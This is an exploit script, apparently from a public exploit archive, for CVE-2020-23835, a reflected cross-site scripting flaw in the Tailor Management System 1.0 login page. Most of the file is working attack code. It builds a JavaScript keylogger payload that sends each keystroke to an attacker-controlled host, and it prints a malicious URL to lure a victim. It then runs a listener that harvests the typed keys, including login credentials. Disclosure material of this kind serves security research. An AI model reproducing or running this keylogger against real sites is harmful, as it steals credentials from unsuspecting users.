# Exploit Title: Tailor MS 1.0 - Reflected Cross-Site Scripting
# Exploit Author: Bobby Cooke (boku)  & Adeeb Shah (@hyd3sec)
# Date: 2020-09-14
# CVE ID: CVE-2020-23835
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/tailor.zip
# Version: 1.0
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
# OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS)
# CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - Type 1: Reflected XSS
# CWE-523: Unprotected Transport of Credentials
# CVSS Base Score: 6.4 # Impact Subscore: 4.7 # Exploitability Subscore: 1.6
# CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L
# Vulnerability Description: 
# Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of SourceCodesters Tailor Management System v1.0 allows remote attackers to harvest keys pressed via unauthenticated victim clicking malicious URL and typing.

# Reflected XSS Key Logger

import socket,sys,urllib,re
from thread import *
from colorama import Fore, Style


F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok   = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err  = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]
R, C, G = Fore.RED, Fore.CYAN, Fore.GREEN

def urlEncode(javascript):
    return urllib.quote(javascript)

def genXssPayload(LHOST,LPORT):
    XSS_PAYLOAD  = '<script>'
    XSS_PAYLOAD += 'var xhr = new XMLHttpRequest();'
    XSS_PAYLOAD += 'document.onkeypress = function keyLogger(key) {'
    XSS_PAYLOAD += 'key_press = String.fromCharCode(key.which);'
    XSS_PAYLOAD += 'var uri = "http://'+LHOST+':'+LPORT+'?KEY="+key_press;'
    XSS_PAYLOAD += 'xhr.open("GET", uri, true);'
    XSS_PAYLOAD += 'xhr.send();}'
    XSS_PAYLOAD += '</script>'
    return XSS_PAYLOAD

def clientthread(conn):
    try:
        while True:
            data = conn.recv(1024)
            key = re.findall(r'KEY\=\w',data)
            key = re.sub('KEY\=','',key[0])
            print(printKey(key))
            if not data:
                break
    except:
        conn.close()

def banner():
    BANNER  = S[3]+C+' _______ _______ _______     _______ _______ _______     _______ _______ _______ _______ _______ _______ \n'
    BANNER += C+'|\     /|\     /|\     /|   |\     /|\     /|\     /|   |\     /|\     /|\     /|\     /|\     /|\     /|\n'
    BANNER += C+'| +---+ | +---+ | +---+ |   | +---+ | +---+ | +---+ |   | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n'
    BANNER += C+'| |   | | |   | | |   | |   | |   | | |   | | |   | |   | |   | | |   | | |   | | |   | | |   | | |   | |\n'
    BANNER += C+'| | '+R+'X'+C+' | | | '+R+'$'+C+' | | | '+R+'$'+C+' | |   | | '+R+'K'+C+' | | | '+R+'3'+C+' | | | '+R+'Y'+C+' | |   | | '+R+'L'+C+' | | | '+R+'0'+C+' | | | '+R+'G'+C+' | | | '+R+'G'+C+' | | | '+R+'3'+C+' | | | '+R+'R'+C+' | |\n'
    BANNER += C+'| +---+ | +---+ | +---+ |   | +---+ | +---+ | +---+ |   | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n'
    BANNER += C+'|/_____\|/_____\|/_____\|   |/_____\|/_____\|/_____\|   |/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|\n\r\n'
    BANNER += '                                          '+R+'BOKU '+F[0]+'&'+C+' HYD3SEC'+F[0]+S[0]+'\r\n'
    return BANNER

def printKey(key):
    keyGen  = S[3]+C+'     _______\n' 
    keyGen += C+'    |\     /|\n'
    keyGen += C+'    | +---+ |\n'
    keyGen += C+'    | |   | |\n'
    keyGen += C+'    | | '+R+key+C+' | |\n'
    keyGen += C+'    | +---+ |\n'
    keyGen += C+'    |/_____\|'+F[0]+S[0]
    return keyGen         

def header():
    head = S[1]+F[2]+'                         __---* '+F[7]+'Tailor MS v1.0 '+F[2]+'| '+F[7]+'Reflected XSS Key Logger '+F[2]+'*---__\n'+S[0]
    return head

def formatHelp(STRING):
    return S[3]+F[2]+STRING+S[0]

if __name__ == "__main__":
    print(header())
    print(banner())
    if len(sys.argv) != 4:
        print(ok+formatHelp(" Usage:   python %s <WEBAPP_URL> <LHOST> <LPORT>" % sys.argv[0]))
        print(ok+formatHelp(" Example: python %s 'http://172.16.65.134/tailor/' '172.16.65.1' 80\r\n" % sys.argv[0]))
        print(err+"Try Again..\r\n")
        sys.exit(-1)
    WEBAPP_URL = sys.argv[1]
    LHOST = sys.argv[2]
    LPORT = sys.argv[3]
    if not re.match(r".*/$", WEBAPP_URL):
        WEBAPP_URL = WEBAPP_URL+'/'
    WEBAPP_URL = WEBAPP_URL+'index.php'
    PAYLOAD = genXssPayload(LHOST,LPORT)
    ENCODED_PAYLOAD = urlEncode(PAYLOAD)
    print(ok+F[0]+'To '+S[3]+F[2]+'Harvest Keys'+F[0]+S[0]+', have a'+F[3]+' User '+F[0]+'visit '+F[5]+'this URL'+F[0]+' and '+F[7]+'Login'+F[0]+':\r\n')
    print(S[3]+F[5]+WEBAPP_URL+'?error=ALL%20YOUR%20K3Y$%20ARE%20BELONG%20TO%20US.%20'+ENCODED_PAYLOAD+S[0]+'\r\n')
    LPORT = int(LPORT)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((LHOST,LPORT))
    print(ok+S[1]+G+"Binding to Socket."+F[0]+S[0])
    s.listen(100)
    print(ok+S[1]+G+"Listening on Socket for incoming connections."+F[0]+S[0])
    try:
        while 1:
            conn, addr = s.accept()
            start_new_thread(clientthread ,(conn,))
    except:
        s.close()
        print('\r\n'+err+"Exiting Keylogger Credential Harvester..")